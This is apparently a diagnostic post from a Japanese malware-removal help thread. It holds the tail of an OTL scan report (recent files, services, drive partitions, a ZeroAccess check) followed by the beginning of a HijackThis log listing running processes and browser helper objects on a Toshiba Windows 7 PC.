[2015/04/10 17:53:01 | 000,000,000 | ---D | C] -- C:\Users\ryota\AppData\Local\Apple
[2015/04/04 21:24:54 | 000,000,000 | ---D | C] -- C:\Users\ryota\AppData\Roaming\Malwarebytes
[2015/04/04 21:24:37 | 000,000,000 | ---D | C] -- C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Malwarebytes' Anti-Malware
[2015/04/04 21:24:37 | 000,000,000 | ---D | C] -- C:\ProgramData\Malwarebytes
[2015/04/04 21:24:36 | 000,025,928 | ---- | C] (Malwarebytes Corporation) -- C:\WINDOWS\SysNative\drivers\mbam.sys
[2015/04/04 21:24:36 | 000,000,000 | ---D | C] -- C:\Program Files (x86)\Malwarebytes' Anti-Malware
[2015/04/04 21:21:57 | 010,285,040 | ---- | C] (Malwarebytes Corporation ) -- C:\Users\ryota\Desktop\mbam-setup-1.75.0.1300.exe
[2015/04/04 19:35:46 | 000,000,000 | ---D | C] -- C:\Users\ryota\AppData\Local\Adobe
[2015/04/04 19:27:38 | 000,000,000 | ---D | C] -- C:\Users\ryota\Tracing
[2015/04/04 18:34:25 | 000,000,000 | --SD | C] -- C:\WINDOWS\SysWow64\GWX
[2015/04/04 18:34:25 | 000,000,000 | --SD | C] -- C:\WINDOWS\SysNative\GWX
[2015/04/04 18:11:11 | 000,000,000 | ---D | C] -- C:\Users\ryota\Desktop\Mario Story (J) [!]
[2015/04/04 18:08:59 | 000,000,000 | ---D | C] -- C:\Users\ryota\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\JWord(日本語キーワード)
[2015/04/04 17:31:07 | 000,000,000 | ---D | C] -- C:\Users\ryota\AppData\Roaming\Geek Uninstaller
[2015/04/04 16:36:25 | 000,000,000 | ---D | C] -- C:\Users\ryota\Desktop\geek
[2015/04/04 16:33:36 | 000,050,688 | ---- | C] (Atribune.org) -- C:\Users\ryota\Desktop\ATF-Cleaner (1).exe
[2015/02/02 23:25:12 | 000,782,480 | ---- | C] (Neople inc) -- C:\Users\ryota\AppData\Local\AradIns.exe
[2015/02/02 23:24:38 | 000,584,336 | ---- | C] (Neople inc) -- C:\Users\ryota\AppData\Local\NeopleCustomURLStarter.exe
[4 C:\WINDOWS\SysWow64\*.tmp files -> C:\WINDOWS\SysWow64\*.tmp -> ]
[1 C:\WINDOWS\*.tmp files -> C:\WINDOWS\*.tmp -> ]

[color=#E56717]========== Files - Modified Within 30 Days ==========[/color]

[2015/04/21 01:45:52 | 000,067,584 | --S- | M] () -- C:\WINDOWS\bootstat.dat
[2015/04/21 01:43:44 | 268,435,456 | -HS- | M] () -- C:\swapfile.sys
[2015/04/21 01:43:39 | 2474,680,319 | -HS- | M] () -- C:\hiberfil.sys
[2015/04/21 01:41:35 | 000,002,196 | ---- | M] () -- C:\Users\Public\Desktop\Google Chrome.lnk
[2015/04/21 01:40:21 | 000,000,702 | ---- | M] () -- C:\WINDOWS\tasks\GoogleUpdateTaskMachineCore.job
[2015/04/21 00:59:00 | 000,000,706 | ---- | M] () -- C:\WINDOWS\tasks\GoogleUpdateTaskMachineUA.job
[2015/04/21 00:48:00 | 000,000,626 | ---- | M] () -- C:\WINDOWS\tasks\Adobe Flash Player Updater.job
[2015/04/20 22:35:30 | 000,000,020 | ---- | M] () -- C:\Users\ryota\AppData\Roaming\appdataFr3.bin
[2015/04/20 21:58:27 | 000,001,140 | ---- | M] () -- C:\Users\Public\Desktop\herdProtect.lnk
[2015/04/20 21:57:26 | 000,602,112 | ---- | M] (OldTimer Tools) -- C:\Users\ryota\Desktop\OTL.exe
[2015/04/20 21:54:14 | 002,873,112 | ---- | M] (Reason Company Software Inc.) -- C:\Users\ryota\Desktop\herdProtectScan_Setup.exe
[2015/04/18 19:31:33 | 001,496,524 | ---- | M] () -- C:\WINDOWS\SysNative\PerfStringBackup.INI
[2015/04/18 19:31:33 | 000,722,278 | ---- | M] () -- C:\WINDOWS\SysNative\perfh009.dat
[2015/04/18 19:31:33 | 000,499,650 | ---- | M] () -- C:\WINDOWS\SysNative\perfh011.dat
[2015/04/18 19:31:33 | 000,135,458 | ---- | M] () -- C:\WINDOWS\SysNative\perfc011.dat
[2015/04/18 19:31:33 | 000,135,394 | ---- | M] () -- C:\WINDOWS\SysNative\perfc009.dat
[2015/04/16 05:31:51 | 000,215,552 | ---- | M] (Microsoft Corporation) -- C:\WINDOWS\SysNative\msclmd.dll
[2015/04/16 05:31:51 | 000,195,072 | ---- | M] (Microsoft Corporation) -- C:\WINDOWS\SysWow64\msclmd.dll
[2015/04/14 08:24:21 | 000,792,056 | ---- | M] (Adobe Systems Incorporated) -- C:\WINDOWS\SysWow64\FlashPlayerApp.exe
[2015/04/14 08:24:21 | 000,178,168 | ---- | M] (Adobe Systems Incorporated) -- C:\WINDOWS\SysWow64\FlashPlayerCPLApp.cpl
[2015/04/04 21:39:57 | 000,001,132 | ---- | M] () -- C:\Users\Public\Desktop\Malwarebytes Anti-Malware.lnk
[2015/04/04 21:23:16 | 010,285,040 | ---- | M] (Malwarebytes Corporation ) -- C:\Users\ryota\Desktop\mbam-setup-1.75.0.1300.exe
[2015/04/04 19:51:47 | 000,001,098 | ---- | M] () -- C:\Users\ryota\Application Data\Microsoft\Internet Explorer\Quick Launch\WorldofTanks.lnk
[2015/04/04 19:43:00 | 000,000,310 | ---- | M] () -- C:\WINDOWS\tasks\Price Meter Updater.job
[2015/04/04 19:25:29 | 000,001,170 | ---- | M] () -- C:\Users\Public\Desktop\Mozilla Firefox.lnk
[2015/04/04 16:38:09 | 000,000,841 | ---- | M] () -- C:\Users\Public\Desktop\CCleaner.lnk
[2015/04/04 16:33:39 | 000,050,688 | ---- | M] (Atribune.org) -- C:\Users\ryota\Desktop\ATF-Cleaner (1).exe
[2015/03/24 06:59:25 | 001,733,952 | ---- | M] (Microsoft Corporation) -- C:\WINDOWS\SysNative\ntdll.dll
[2015/03/24 06:59:25 | 000,360,480 | ---- | M] (Microsoft Corporation) -- C:\WINDOWS\SysNative\sechost.dll
[2015/03/24 06:59:00 | 007,476,032 | ---- | M] (Microsoft Corporation) -- C:\WINDOWS\SysNative\ntoskrnl.exe
[2015/03/23 07:45:41 | 000,227,328 | ---- | M] (Microsoft Corporation) -- C:\WINDOWS\SysNative\aepdu.dll
[2015/03/23 07:09:23 | 000,726,528 | ---- | M] (Microsoft Corporation) -- C:\WINDOWS\SysNative\generaltel.dll
[2015/03/23 07:09:22 | 001,111,552 | ---- | M] (Microsoft Corporation) -- C:\WINDOWS\SysNative\aeinv.dll
[2015/03/23 07:09:22 | 000,957,440 | ---- | M] (Microsoft Corporation) -- C:\WINDOWS\SysNative\appraiser.dll
[2015/03/23 07:09:22 | 000,769,024 | ---- | M] (Microsoft Corporation) -- C:\WINDOWS\SysNative\invagent.dll
[2015/03/23 07:09:22 | 000,419,328 | ---- | M] (Microsoft Corporation) -- C:\WINDOWS\SysNative\devinv.dll
[2015/03/23 07:09:22 | 000,030,720 | ---- | M] (Microsoft Corporation) -- C:\WINDOWS\SysNative\acmigration.dll
[4 C:\WINDOWS\SysWow64\*.tmp files -> C:\WINDOWS\SysWow64\*.tmp -> ]
[1 C:\WINDOWS\*.tmp files -> C:\WINDOWS\*.tmp -> ]

[color=#E56717]========== Files Created - No Company Name ==========[/color]

[2015/04/20 21:58:27 | 000,001,140 | ---- | C] () -- C:\Users\Public\Desktop\herdProtect.lnk
[2015/04/15 04:37:38 | 000,016,303 | ---- | C] () -- C:\WINDOWS\SysWow64\ieuinit.inf
[2015/04/15 04:37:38 | 000,016,303 | ---- | C] () -- C:\WINDOWS\SysNative\ieuinit.inf
[2015/04/04 21:24:37 | 000,001,132 | ---- | C] () -- C:\Users\Public\Desktop\Malwarebytes Anti-Malware.lnk
[2015/03/15 00:01:07 | 000,107,008 | ---- | C] () -- C:\WINDOWS\SysWow64\OEMLicense.dll
[2015/03/14 23:59:54 | 000,046,080 | ---- | C] () -- C:\WINDOWS\SysWow64\BWContextHandler.dll
[2015/03/02 14:09:57 | 000,000,020 | ---- | C] () -- C:\Users\ryota\AppData\Roaming\appdataFr3.bin
[2014/11/19 17:11:37 | 000,000,242 | RHS- | C] () -- C:\ProgramData\ntuser.pol
[2014/10/01 19:54:10 | 000,183,808 | ---- | C] () -- C:\WINDOWS\SysWow64\igdde32.dll
[2014/10/01 19:54:10 | 000,143,360 | ---- | C] () -- C:\WINDOWS\SysWow64\igdail32.dll
[2014/09/24 15:58:21 | 000,002,255 | ---- | C] () -- C:\WINDOWS\SysWow64\WimBootCompress.ini
[2014/02/15 00:25:26 | 000,645,632 | ---- | C] () -- C:\WINDOWS\SysWow64\xvidcore.dll
[2014/02/15 00:25:26 | 000,240,640 | ---- | C] () -- C:\WINDOWS\SysWow64\xvidvfw.dll
[2014/02/15 00:25:25 | 000,079,360 | ---- | C] () -- C:\WINDOWS\SysWow64\ff_vfw.dll
[2014/02/15 00:25:17 | 000,178,688 | ---- | C] () -- C:\WINDOWS\SysWow64\unrar.dll
[2014/02/15 00:25:15 | 000,715,038 | ---- | C] () -- C:\WINDOWS\unins000.exe
[2014/02/15 00:25:15 | 000,216,064 | ---- | C] ( ) -- C:\WINDOWS\SysWow64\lagarith.dll
[2014/02/15 00:25:15 | 000,001,990 | ---- | C] () -- C:\WINDOWS\unins000.dat
[2013/10/28 17:28:07 | 000,188,416 | ---- | C] () -- C:\WINDOWS\SysWow64\utv_core.dll
[2013/10/28 17:28:07 | 000,069,632 | ---- | C] () -- C:\WINDOWS\SysWow64\utv_vcm.dll
[2013/09/15 16:04:47 | 000,000,189 | ---- | C] () -- C:\Users\ryota\AppData\Roaming\WB.CFG
[2013/08/23 00:36:43 | 000,215,943 | ---- | C] () -- C:\WINDOWS\SysWow64\dssec.dat
[2013/08/23 00:36:42 | 000,000,741 | ---- | C] () -- C:\WINDOWS\SysWow64\NOISE.DAT
[2013/08/22 23:46:23 | 000,067,584 | --S- | C] () -- C:\WINDOWS\bootstat.dat
[2013/08/22 16:01:23 | 000,043,131 | ---- | C] () -- C:\WINDOWS\mib.bin
[2013/08/22 08:55:20 | 000,364,544 | ---- | C] () -- C:\WINDOWS\SysWow64\msjetoledb40.dll
[2013/08/22 08:52:39 | 000,673,088 | ---- | C] () -- C:\WINDOWS\SysWow64\mlang.dat
[2012/12/18 00:56:03 | 001,161,682 | ---- | C] () -- C:\Users\ryota\記録されたゲーム - 17-12-2012 10`00`02.mgx
[2012/12/13 15:28:00 | 012,706,828 | ---- | C] () -- C:\Users\ryota\03 Another Heaven.mp3
[2012/12/13 15:28:00 | 010,296,232 | ---- | C] () -- C:\Users\ryota\06 Ｋａｌｅｉｄｏｓｃｏｐｅ（ｔｒａｎｓｐａｒｅｎｔ　ｍｉｘ｜Ｂｏｎｕｓ　Ｔｒａｃｋ）.mp3
[2012/12/13 15:28:00 | 009,962,152 | ---- | C] () -- C:\Users\ryota\05 ARCADIA-Instrumental-.mp3
[2012/12/13 15:28:00 | 009,877,588 | ---- | C] () -- C:\Users\ryota\02 HORIZON.mp3
[2012/12/13 15:28:00 | 009,842,092 | ---- | C] () -- C:\Users\ryota\01 ARCADIA.mp3
[2012/12/13 15:28:00 | 003,751,396 | ---- | C] () -- C:\Users\ryota\04 ARCADIA-game Ver.-.mp3
[2012/10/31 18:22:16 | 000,003,077 | ---- | C] () -- C:\ProgramData\cfSB1290.ini

[color=#E56717]========== ZeroAccess Check ==========[/color]

[2015/04/20 22:45:57 | 000,000,227 | RHS- | M] () -- C:\WINDOWS\assembly\Desktop.ini

[HKEY_CURRENT_USER\Software\Classes\clsid\{42aedc87-2188-41fd-b9a3-0c966feabec1}\InProcServer32] /64

[HKEY_CURRENT_USER\Software\Classes\Wow6432node\clsid\{42aedc87-2188-41fd-b9a3-0c966feabec1}\InProcServer32]

[HKEY_CURRENT_USER\Software\Classes\clsid\{fbeb8a05-beee-4442-804e-409d6c4515e9}\InProcServer32] /64

[HKEY_CURRENT_USER\Software\Classes\Wow6432node\clsid\{fbeb8a05-beee-4442-804e-409d6c4515e9}\InProcServer32]

[HKEY_LOCAL_MACHINE\Software\Classes\clsid\{42aedc87-2188-41fd-b9a3-0c966feabec1}\InProcServer32] /64
"" = C:\Windows\SysNative\shell32.dll -- [2015/02/13 02:40:58 | 022,291,584 | ---- | M] (Microsoft Corporation)
"ThreadingModel" = Apartment

[HKEY_LOCAL_MACHINE\Software\Wow6432Node\Classes\clsid\{42aedc87-2188-41fd-b9a3-0c966feabec1}\InProcServer32]
"" = %SystemRoot%\system32\shell32.dll -- [2015/02/13 02:34:06 | 019,731,824 | ---- | M] (Microsoft Corporation)
"ThreadingModel" = Apartment

[HKEY_LOCAL_MACHINE\Software\Classes\clsid\{5839FCA9-774D-42A1-ACDA-D6A79037F57F}\InProcServer32] /64
"" = C:\Windows\SysNative\wbem\fastprox.dll -- [2014/10/29 10:19:43 | 001,013,760 | ---- | M] (Microsoft Corporation)
"ThreadingModel" = Free

[HKEY_LOCAL_MACHINE\Software\Wow6432Node\Classes\clsid\{5839FCA9-774D-42A1-ACDA-D6A79037F57F}\InProcServer32]
"" = %systemroot%\system32\wbem\fastprox.dll -- [2014/10/29 09:59:23 | 000,786,944 | ---- | M] (Microsoft Corporation)
"ThreadingModel" = Free

[HKEY_LOCAL_MACHINE\Software\Classes\clsid\{F3130CDB-AA52-4C3A-AB32-85FFC23AF9C1}\InProcServer32] /64
"" = C:\Windows\SysNative\wbem\wbemess.dll -- [2014/10/29 10:16:01 | 000,512,512 | ---- | M] (Microsoft Corporation)
"ThreadingModel" = Both

[HKEY_LOCAL_MACHINE\Software\Wow6432Node\Classes\clsid\{F3130CDB-AA52-4C3A-AB32-85FFC23AF9C1}\InProcServer32]

[color=#E56717]========== Custom Scans ==========[/color]

[color=#A23BEC]< %windir%\tasks\*.job >[/color]
[2015/04/21 00:48:00 | 000,000,626 | ---- | M] () -- C:\WINDOWS\tasks\Adobe Flash Player Updater.job
[2015/04/21 01:40:21 | 000,000,702 | ---- | M] () -- C:\WINDOWS\tasks\GoogleUpdateTaskMachineCore.job
[2015/04/21 00:59:00 | 000,000,706 | ---- | M] () -- C:\WINDOWS\tasks\GoogleUpdateTaskMachineUA.job
[2015/04/04 19:43:00 | 000,000,310 | ---- | M] () -- C:\WINDOWS\tasks\Price Meter Updater.job

[color=#E56717]========== Drive Information ==========[/color]

Physical Drives
---------------

Drive: \\\\.\\PHYSICALDRIVE0 - Fixed hard disk media
Interface type: IDE
Media Type: Fixed hard disk media
Model: WDC WD5000AAKX-00ERMA0
Partitions: 5
Status: OK
Status Info: 0

Drive: \\\\.\\PHYSICALDRIVE1 -
Interface type: USB
Media Type:
Model: Multi Flash Reader USB Device
Partitions: 0
Status: OK
Status Info: 0

Partitions
---------------

DeviceID: Disk #0, Partition #0
PartitionType: GPT: Unknown
Bootable: False
BootPartition: False
PrimaryPartition: False
Size: 300.00MB
Starting Offset: 1048576
Hidden sectors: 0


DeviceID: Disk #0, Partition #1
PartitionType: GPT: System
Bootable: True
BootPartition: True
PrimaryPartition: True
Size: 100.00MB
Starting Offset: 315621376
Hidden sectors: 0


DeviceID: Disk #0, Partition #2
PartitionType: GPT: Unknown
Bootable: False
BootPartition: False
PrimaryPartition: False
Size: 8.00GB
Starting Offset: 554696704
Hidden sectors: 0


DeviceID: Disk #0, Partition #3
PartitionType: GPT: Basic Data
Bootable: False
BootPartition: False
PrimaryPartition: True
Size: 457.00GB
Starting Offset: 8943304704
Hidden sectors: 0


DeviceID: Disk #0, Partition #4
PartitionType: GPT: Unknown
Bootable: False
BootPartition: False
PrimaryPartition: False
Size: 456.00MB
Starting Offset: 499629686784
Hidden sectors: 0


[color=#E56717]========== Base Services ==========[/color]
SRV:[b]64bit:[/b] - [2014/10/29 11:42:20 | 000,214,528 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\aelupsvc.dll -- (AeLookupSvc)
SRV:[b]64bit:[/b] - [2014/10/29 11:44:33 | 000,110,080 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\appinfo.dll -- (Appinfo)
SRV:[b]64bit:[/b] - [2014/10/29 10:21:02 | 000,096,768 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\alg.exe -- (ALG)
SRV:[b]64bit:[/b] - [2014/10/29 10:43:34 | 000,933,376 | ---- | M] (Microsoft Corporation) [Auto | Stopped] -- C:\Windows\SysNative\qmgr.dll -- (BITS)
SRV:[b]64bit:[/b] - [2014/10/29 10:24:40 | 000,845,312 | ---- | M] (Microsoft Corporation) [Auto | Stopped] -- C:\Windows\SysNative\BFE.DLL -- (BFE)
SRV:[b]64bit:[/b] - [2014/10/29 10:22:40 | 000,062,464 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\keyiso.dll -- (KeyIso)
SRV - [2014/10/29 10:01:27 | 000,046,592 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysWOW64\keyiso.dll -- (KeyIso)
SRV:[b]64bit:[/b] - [2014/10/29 10:12:28 | 000,516,608 | ---- | M] (Microsoft Corporation) [Auto | Stopped] -- C:\Windows\SysNative\es.dll -- (EventSystem)
SRV - [2014/10/29 09:55:10 | 000,367,616 | ---- | M] (Microsoft Corporation) [Auto | Stopped] -- C:\Windows\SysWOW64\es.dll -- (EventSystem)
SRV:[b]64bit:[/b] - [2014/10/29 10:26:50 | 000,135,168 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\browser.dll -- (Browser)
SRV:[b]64bit:[/b] - [2014/10/29 10:27:24 | 000,131,584 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\cryptsvc.dll -- (CryptSvc)
SRV:[b]64bit:[/b] - [2014/10/29 10:19:29 | 000,817,664 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\rpcss.dll -- (DcomLaunch)
SRV:[b]64bit:[/b] - [2014/10/29 10:29:06 | 000,365,056 | ---- | M] (Microsoft Corporation) [Auto | Stopped] -- C:\Windows\SysNative\dhcpcore.dll -- (Dhcp)
SRV - [2014/10/29 10:05:58 | 000,292,864 | ---- | M] (Microsoft Corporation) [Auto | Stopped] -- C:\Windows\SysWOW64\dhcpcore.dll -- (Dhcp)
SRV:[b]64bit:[/b] - [2014/10/29 10:29:41 | 000,252,416 | ---- | M] (Microsoft Corporation) [Auto | Stopped] -- C:\Windows\SysNative\dnsrslvr.dll -- (Dnscache)
SRV:[b]64bit:[/b] - [2014/10/29 10:14:35 | 000,110,592 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\eapsvc.dll -- (Eaphost)
SRV:[b]64bit:[/b] - [2014/10/29 11:44:23 | 000,033,792 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\hidserv.dll -- (hidserv)
SRV - [2014/10/29 10:59:46 | 000,030,720 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysWOW64\hidserv.dll -- (hidserv)
SRV:[b]64bit:[/b] - [2014/10/29 10:07:58 | 000,452,608 | ---- | M] (Microsoft Corporation) [Disabled | Stopped] -- C:\Windows\SysNative\ipnathlp.dll -- (SharedAccess)
SRV:[b]64bit:[/b] - [2014/10/29 10:08:58 | 000,397,312 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\IPSECSVC.DLL -- (PolicyAgent)
No service found with a name of MsMpSvc
No service found with a name of NisSrv
SRV:[b]64bit:[/b] - [2014/10/29 10:01:45 | 000,706,048 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\swprv.dll -- (swprv)
SRV:[b]64bit:[/b] - [2014/10/29 10:22:44 | 000,071,168 | ---- | M] (Microsoft Corporation) [Auto | Stopped] -- C:\Windows\SysNative\mmcss.dll -- (MMCSS)
SRV:[b]64bit:[/b] - [2014/10/29 09:51:03 | 000,266,752 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\netman.dll -- (Netman)
SRV:[b]64bit:[/b] - [2014/10/29 10:19:20 | 000,550,912 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\netprofmsvc.dll -- (netprofm)
SRV:[b]64bit:[/b] - [2014/12/06 10:41:58 | 000,391,680 | ---- | M] (Microsoft Corporation) [Auto | Stopped] -- C:\Windows\SysNative\nlasvc.dll -- (NlaSvc)
SRV:[b]64bit:[/b] - [2014/10/29 10:29:16 | 000,028,672 | ---- | M] (Microsoft Corporation) [Auto | Stopped] -- C:\Windows\SysNative\nsisvc.dll -- (nsi)
SRV:[b]64bit:[/b] - [2014/10/29 11:45:24 | 000,116,736 | ---- | M] (Microsoft Corporation) [On_Demand | Running] -- C:\Windows\SysNative\umpnpmgr.dll -- (PlugPlay)
SRV:[b]64bit:[/b] - [2014/10/29 09:54:15 | 000,827,392 | ---- | M] (Microsoft Corporation) [Auto | Stopped] -- C:\Windows\SysNative\spoolsv.exe -- (Spooler)
No service found with a name of ProtectedStorage
No service found with a name of EMDMgmt
SRV:[b]64bit:[/b] - [2014/10/29 11:34:42 | 000,102,912 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\rasauto.dll -- (RasAuto)
SRV:[b]64bit:[/b] - [2014/10/29 09:59:21 | 000,542,208 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\rasmans.dll -- (RasMan)
SRV:[b]64bit:[/b] - [2014/10/29 10:19:29 | 000,817,664 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\rpcss.dll -- (RpcSs)
SRV:[b]64bit:[/b] - [2014/10/29 11:42:25 | 000,031,744 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\seclogon.dll -- (seclogon)
SRV:[b]64bit:[/b] - [2014/10/29 12:51:48 | 000,047,024 | ---- | M] (Microsoft Corporation) [Auto | Stopped] -- C:\Windows\SysNative\lsass.exe -- (SamSs)
SRV:[b]64bit:[/b] - [2014/10/29 09:56:06 | 000,146,944 | ---- | M] (Microsoft Corporation) [Auto | Stopped] -- C:\Windows\SysNative\wscsvc.dll -- (wscsvc)
SRV:[b]64bit:[/b] - [2014/10/29 10:18:49 | 000,329,216 | ---- | M] (Microsoft Corporation) [Auto | Stopped] -- C:\Windows\SysNative\srvsvc.dll -- (LanmanServer)
SRV:[b]64bit:[/b] - [2014/10/29 10:04:06 | 000,640,000 | ---- | M] (Microsoft Corporation) [Auto | Stopped] -- C:\Windows\SysNative\shsvcs.dll -- (ShellHWDetection)
SRV - [2014/10/29 09:49:09 | 000,576,512 | ---- | M] (Microsoft Corporation) [Auto | Stopped] -- C:\Windows\SysWOW64\shsvcs.dll -- (ShellHWDetection)
No service found with a name of slsvc
SRV:[b]64bit:[/b] - [2014/10/29 09:52:52 | 001,265,152 | ---- | M] (Microsoft Corporation) [Auto | Stopped] -- C:\Windows\SysNative\schedsvc.dll -- (Schedule)
SRV:[b]64bit:[/b] - [2014/10/29 11:12:14 | 000,313,344 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\tapisrv.dll -- (TapiSrv)
SRV - [2014/10/29 10:34:59 | 000,254,464 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysWOW64\tapisrv.dll -- (TapiSrv)
SRV:[b]64bit:[/b] - [2014/10/29 10:26:29 | 000,059,392 | ---- | M] (Microsoft Corporation) [Auto | Stopped] -- C:\Windows\SysNative\themeservice.dll -- (Themes)
SRV:[b]64bit:[/b] - [2014/12/09 10:50:34 | 000,225,280 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\profsvc.dll -- (ProfSvc)
SRV:[b]64bit:[/b] - [2014/10/29 09:59:28 | 001,454,080 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\VSSVC.exe -- (VSS)
SRV:[b]64bit:[/b] - [2014/10/29 10:02:48 | 000,911,360 | ---- | M] (Microsoft Corporation) [Auto | Stopped] -- C:\Windows\SysNative\audiosrv.dll -- (Audiosrv)
SRV:[b]64bit:[/b] - [2014/12/06 10:35:00 | 000,229,888 | ---- | M] (Microsoft Corporation) [Auto | Stopped] -- C:\Windows\SysNative\AudioEndpointBuilder.dll -- (AudioEndpointBuilder)
No service found with a name of SDRSVC
SRV:[b]64bit:[/b] - [2015/02/04 08:58:28 | 000,023,792 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Program Files\Windows Defender\MsMpEng.exe -- (WinDefend)
SRV:[b]64bit:[/b] - [2014/10/29 10:16:27 | 001,696,256 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\wevtsvc.dll -- (EventLog)
SRV:[b]64bit:[/b] - [2014/10/29 10:02:44 | 000,880,640 | ---- | M] (Microsoft Corporation) [Auto | Stopped] -- C:\Windows\SysNative\MPSSVC.dll -- (MpsSvc)
SRV:[b]64bit:[/b] - [2014/10/29 10:59:24 | 000,670,720 | ---- | M] (Microsoft Corporation) [Auto | Stopped] -- C:\Windows\SysNative\wiaservc.dll -- (stisvc)
SRV:[b]64bit:[/b] - [2014/10/29 11:35:14 | 000,064,512 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\WINDOWS\SysNative\msiexec.exe -- (msiserver)
SRV - [2014/10/29 10:52:53 | 000,059,904 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\WINDOWS\SysWow64\msiexec.exe -- (msiserver)
SRV:[b]64bit:[/b] - [2014/10/29 10:18:13 | 000,230,400 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\wbem\WMIsvc.dll -- (Winmgmt)
SRV:[b]64bit:[/b] - [2015/03/14 09:22:58 | 003,678,720 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\wuaueng.dll -- (wuauserv)
SRV:[b]64bit:[/b] - [2014/10/29 10:53:17 | 000,262,144 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\dot3svc.dll -- (dot3svc)
SRV:[b]64bit:[/b] - [2014/10/29 10:03:56 | 001,547,264 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\wlansvc.dll -- (WlanSvc)
SRV:[b]64bit:[/b] - [2014/10/29 10:24:29 | 000,289,280 | ---- | M] (Microsoft Corporation) [Auto | Stopped] -- C:\Windows\SysNative\wkssvc.dll -- (LanmanWorkstation)

[color=#A23BEC]< %SYSTEMDRIVE%\*.exe >[/color]
[2007/11/20 23:08:08 | 000,562,688 | ---- | M] (Microsoft Corporation) -- C:\install.exe
[2010/07/08 01:11:00 | 000,183,296 | R--- | M] (I-O DATA DEVICE,INC.) -- C:\IOOCI.EXE

[color=#E56717]========== Files - Unicode (All) ==========[/color]
(C:\Users\ryota\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\傲游??器 3) -- C:\Users\ryota\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\傲游浏览器 3

[color=#E56717]========== Alternate Data Streams ==========[/color]

@Alternate Data Stream - 118 bytes -> C:\ProgramData\Temp:373E1720

< End of report >

作業完了しました。


HJTログ


Logfile of Trend Micro HijackThis v2.0.5
Scan saved at 17:40:15, on 2015/04/21
Platform: Windows 7 SP1 (WinNT 6.00.3505)
MSIE: Internet Explorer v11.0 (11.00.9600.17728)


Boot mode: Normal

Running processes:
C:\Users\USER\AppData\Local\Microsoft\BingSvc\BingSvc.exe
C:\Program Files (x86)\NTTW\StartUpToolN\StartUpTool_w.exe
C:\Program Files (x86)\TOSHIBA\Sync Utility\TosSyncScheduler.exe
C:\Program Files (x86)\dynabook Portal Gadget\dynabook Portal Gadget.exe
C:\Windows\AIOKBApp.exe
C:\Program Files (x86)\TOSHIBA\TOSHIBA Sleep Utility\TSleepSrv.exe
C:\Program Files (x86)\TOSHIBA\TRCMan\TRCMan.exe
C:\Program Files (x86)\TOSHIBA\TKRTL\KarteLite.exe
C:\Program Files (x86)\TOSHIBA\AVApplication\Application\TAVLauncher.exe
C:\Program Files (x86)\TOSHIBA\ConfigFree\NDSTray.exe
C:\Program Files (x86)\TOSHIBA\ConfigFree\CFSwMgr.exe
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
C:\Users\USER\Downloads\HijackThis.exe

F2 - REG:system.ini: UserInit=userinit.exe,
O1 - Hosts: 127.0.0.1 localhost
O1 - Hosts: ::1 localhost
O2 - BHO: Trend Micro NSC BHO - {1CA1377B-DC1D-4A52-9585-6E06050FAC53} - C:\Program Files (x86)\NTTW\SECURITY\AMSP\Module\20004\2.5.1331\6.8.1094\TmIEPlg32.dll
O2 - BHO: Yahoo!ツールバーフィッシング警告 - {1F68E72C-50E5-44B8-8F56-6A54D3AF1DA4} - C:\Program Files (x86)\Yahoo!J\Toolbar\8_0_0_3\Modules\ypho.dll
O2 - BHO: Trend Micro Toolbar BHO - {43C6D902-A1C5-45c9-91F6-FD9E90337E18} - C:\Program Files (x86)\NTTW\SECURITY\SEC\UIFramework\ToolbarIE.dll
O2 - BHO: FlpLauncher Class - {4401FDC3-7996-4774-8D2B-C1AE9CD6CC25} - C:\PROGRA~2\E-BOOK~1\FLIPVI~1\fvbho140.dll
O2 - BHO: Java(tm) Plug-In SSV Helper - {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} - C:\Program Files (x86)\Java\jre1.8.0_45\bin\ssv.dll
